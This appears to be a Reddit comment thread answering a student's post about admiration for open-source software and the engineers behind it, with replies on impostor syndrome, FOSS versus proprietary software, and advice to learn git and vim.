This means that you often rely on the work of others without knowing all the details. This is called [the black box principle](https://en.wikipedia.org/wiki/Black_box). You don't care what happens inside the box. You just know that if you feed it oranges it gives you orange juice.

Then you create your own black box that takes orange juice as input and outputs whiskey. Odds are only you and a few others will ever know what happens inside your box but many more will use it. And so on.
[deleted]
Any significantly advanced technology is indistinguishable from magic.
>  but the things we have achieved in the past several decades, with semiconductor, electrical, electronic, computer and software engineering 

Dude, you have no idea how amazing even the chair you are sitting on is. The paint, the metal, fabric, etc. all come from amazing breakthrough in material science that some genius devoted his life to make. You can't make such a thing in a single factory, but  instead you use components made in other factories. Each component in turn relies on input from other factories and so on. 

And that is just components and materials. Think about the tools, the infrastructure, the finance behind it all, and so on, that are necessary to be able to make that chair. It's a complexity no human mind can fully comprehend.
Being a human, you too are entitled to stand on the shoulders of a giant. Help us build him a little taller in your lifetime
I like text files
I am glad you came out with this praise for developers. 

Developing software is one of the most complex human activities undertaken, and almost no one seems to be aware of it. Writing code requires a series of "inspirations" at each step of the way, it is more akin to research than engineering. The scale is enormous, for example a modern CPU design in HDL (hardware definition language) takes some 2 million lines of code while Ubuntu Linux has some 30 million lines of code. Add all the other projects and the scale is really astounding.
I believe one of the biggest milestones in learning to do something well is right here, in learning how \_little\_ you know. Being aware of the giants ahead of you, but in turn forging forwards anyways to build on top of that, is a sign that are aware of your failings, but in turn trying to improve on them. Keep it up!
Since you mentioned you don't understand how many of the complex systems we use today work (at least at first sight), you might be interested in: [https://github.com/danistefanovic/build-your-own-x](https://github.com/danistefanovic/build-your-own-x)
You know more than I do
someone from nus is contributing to the kernel?!
that calendar website is pretty fancy. if they built it from scratch I'm impressed.
[UNIX Magic](https://i.imgur.com/qMN1are.jpg)
I was proud of my first project completed a couple weeks ago (150 lines of code) until I just read people actually produce *"thousands of lines a code each day"*

Now I just feel pathetic.
Also, the magic never really wears off.  Because there's always something new to learn.  I've been at this 20+ years now.  I've been automating my way through jobs in all that time.  I've written my fair share of Perl, PHP, Bash, Python, and lately Rust.

I recently developed my first threaded application (in Rust) where performance matters.  And learning some of the dark magic behind spmc, mpsc, and mpmc coupled with bounded vs. unbounded, not to mention handling the various data streams from each thread was pretty humbling.  I got to play with the abstracted pieces, but every time I tried to look under the hood, I was convinced there was some definite dark magic happening.
I did not realize that undergraduates are writing thousands of lines per day.
I don't think it matters how long you have been programming, you will always find people that have done things you find amazing. As your knowledge grows, as you make lots of mistakes and learn from them your skills grow.

I have had so many people come to me with a programming problem, describe it, and I give them an answer how to fix it. A lot of times without actually looking their code. They think it great, and how can you do that so fast..... ( Of course it makes me feel good) but I tell them this, which is the truth.

The reason I can solve a lot of the issues you have so quickly is because I have experienced them myself. Spent hours or days trying to fix it and I remember them. I other words I was in the exact same spot are in at one point.

The most rewarding aspect I find now is mentoring / training new developers. Helping them find solutions to problems. Then watching them take what I gave them, apply it to what they are doing, and making it 100 times better.
Hardware engineers have it hard. They deserve an even bigger pat on the back in my eyes.
> Joining university was a simultaneously humbling and enlightening experience, when I realised my peers were writing hundreds, perhaps even thousands of lines of code per day; 

What you are feeling is called the Imposter Syndrome and everyone feels like that from time to time.
It's just a community....

You want to thank people for their work....

Contribute more to the community and you can get more done.
Learn git, you will need it.

Learn vim, you will love it. I was the kind of guy that quit vim by using killall vim, but not anymore. Your coding speed will increase dramatically, and you will lose the fear to editing source or conf files remotely via ssh. No need to scp/rsync anymore, when you can vim' it!
Don't worry about not being a genius like some these people you mentioned, you don't need to be a genius to succeed in CS.
> when I realised my peers were writing hundreds, perhaps even thousands of lines of code per day; one person is a regular contributor to the Linux Kernel.

Sorry, I know this is very irrelevant to your post, but this took me by surprise. Maybe this is because I was at a state college, and you may be at a more prestigious institution, but most people in my classes were barely able to complete their coding assignments, even all the way through senior year, much less writing hundreds or thousands of lines of code a day, and contributing to real projects like the Linux kernel. Not sure if this is the norm.
One man's magic is the other's engineering, you know.
Learn git, you will need it.

Learn vim, you will love it. I was the kind of guy that quit vim by using killall vim, but not anymore. Your coding speed will increase dramatically, and you will lose the fear to editing source or conf files remotely via ssh. No need to scp/rsync anymore, when you can vim' it!
>That being said, even closed-source software is equally wondrous.

You are at step one of the journey.  You think that Windows and Linux are both Operating Systems, so they perform similar functions. They are both inscrutable, so they are equally worthy.

But down the road, you will perceive a rather a large difference. Maybe your computer gets [shut down in the middle of a presentation](https://www.youtube.com/watch?v=sSI-WUeMgSM). Maybe you go to upgrade your OS and realize your favorite program is no longer installable.  You will eventually realize that your pains are not because of inherit software properties, but are explicit [antifeatures](https://wiki.mako.cc/Antifeatures) put there by the owners of the software.  You no longer feel that the software serves your interests, but those of it's owners.

Then you realize that FOSS software is basically immune from that sort of thing. Sure, someone can add a bad feature. But people will [complain](https://github.com/dotnet/cli/issues/3093) and/or [fork](https://www.reddit.com/r/Android/comments/cae892/librechair_the_lawnchair_fork_that_aims_to/) the code and continue on like nothing happened.
*Hal Abelson has entered the chat*
It is truly magical what humans can accomplish through cooperation.  You look at a smart phone or a jet plane and realize nobody understands how it works.  It's impossible, it would make Einstein's head explode trying to imagine all the complex subsystems working in unison.  But collectively we have the knowledge to build it.
Not magic.... Science!
Nice post.
Your attitude is inspiring. Studies have shown that the most intelligent people are the ones that know their limitations and recognize the brilliance of other people. It makes you strive to do better than when you think you're already intelligent and you have no where to go but stagnate.
hey fellow nus student i presume from the link to nusmod u posted. Rare to see a singaporean here in this subreddit!
Keep the faith, brother. I've been using Git for 6 years and I'm not sure I know how to work it yet either.....

Check out lazygit, if you know how to build Go projects. It's fucking awesome and will change your life.
> I realised my peers were writing hundreds, perhaps even thousands of lines of code per day

No they weren't.
Little less than magic? Magic or gtfo
Popcorn is magic if you don't know how it works.
Part of the $30 cost is probably being subsided by selling your clicks to advertisers. A large part of paying for the wonders of the internet comes from selling your privacy.

Not everyone is altruistic.
tl;Dr?
[removed]
Learn git, you will need it.

Learn vim, you will love it. I was the kind of guy that quit vim by using killall vim, but not anymore. Your coding speed will increase dramatically, and you will lose the fear to editing source or conf files remotely over ssh. No need to scp/rsync anymore, when you can vim' it!
